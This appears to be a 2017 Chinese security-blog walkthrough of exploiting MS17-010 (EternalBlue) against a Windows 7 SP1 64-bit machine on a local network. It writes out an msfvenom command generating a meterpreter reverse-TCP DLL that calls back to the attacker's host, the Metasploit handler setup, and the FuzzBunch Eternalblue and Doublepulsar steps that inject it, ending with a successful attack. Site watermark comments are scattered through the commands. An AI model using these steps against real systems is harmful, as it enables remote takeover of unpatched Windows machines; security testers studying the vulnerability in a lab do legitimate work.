安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > (内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

(内网测试)Eternalblue(MS17-010)测试windows 7 sp1 64位

时间:2017-05-16来源:未知 作者:安云网点击:
出了好几天了,一直没看,虽然网络上已经有很多类似文章不过我还是在这里记录一下测试的过程,当然还是内网测试,且在没有防护下进行 kali linux :ip 192.168.0.107 目标机windows 7 sp1:ip 192.168.0.105 攻击03:ip 192.168.0.106 微软公告:

出了好几天了,一直没看,虽然网络上已经有很多类似文章不过我还是在这里记录一下测试的过程,当然还是内网测试,且在没有防护下进行 //安云网,anyun.org

kali linux :ip 192.168.0.107 //内容来自安云网

目标机windows 7 sp1:ip 192.168.0.105 //内容来自安云网

攻击03:ip 192.168.0.106

//安云网,anyun.org

微软公告:Microsoft Security Bulletin MS17-010 - Critical //内容来自安云网

因为需要配合msf所以先生成一下DLL吧! //本文来自安云网

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT 4444 -f dll > testexp.dll //安云网咨询系统 


//copyright AnYun.ORG

接着先打开msf,进行配置

//copyright AnYun.ORG

msfconsole //ANYUN.ORG 


//ANYUN.ORG

使用hanlder模块 //ANYUN.ORG

use exploit/multi/hanlder 

//ANYUN.ORG

在设置payload

//内容来自安云网

set payload windows/x64/meterpreter/reverse_tcp //本文来自安云网 


//copyright AnYun.ORG

好,我们在看看需要设置的

//本文来自安云网

show options //内容来自安云网 


//本文来自安云网

端口默认就是4444不用设置,只需要在设置一下host

//本文来自安云网

set LHOST 192.168.0.107 //安云网咨询系统 


//安云网咨询系统

ok,现在把生成好的dll拷贝回我们的03攻击机上!

//内容来自安云网

现在进入windows目录,执行fb.py //内容来自AnYun.ORG


//本文来自安云网

第一步就是需要设置攻击目标的ip和03攻击机的ip了,这里我们不使用这个输入no

//内容来自安云网


//本文来自安云网

由于我们没有D盘,这里只能改一下设置了一个c盘的log(目录可以自动创建) //本文来自安云网


//安云网,anyun.org

这里只有一个选择就是创建项目,默认回车即可,然后输入任意名称

//安云网,anyun.org


//本文来自安云网

接着使用ETERNALBLUE这个模块

//内容来自安云网

use Eternalblue //内容来自安云网 


//安云网,anyun.org

这里需要注意下:

//copyright AnYun.ORG


//安云网咨询系统

接下来就是使用msf生成的DLL了,使用Doublepulsar模块

//安云网咨询系统

use Doublepulsar 
//内容来自安云网


//安云网咨询系统

一路回车,到这里还是需要注意一下选择

//安云网,anyun.org


//内容来自安云网

选择2(因为我们要用DLL嘛),并且设置DLL存放的目录

//ANYUN.ORG


//安云网,anyun.org

kali上执行exploit //内容来自安云网

exploit 
//本文来自安云网


//内容来自安云网

回到03下在一路回车,最后输入yes执行攻击

//安云网,anyun.org


//内容来自AnYun.ORG

最后攻击成功 //安云网,anyun.org

至于修复方法,我们可以360打个补丁就可以了! //安云网,anyun.org


//内容来自安云网

最后说明一下:被攻击的目标可能会重启,或者蓝屏等问题!

//内容来自安云网


//本文来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容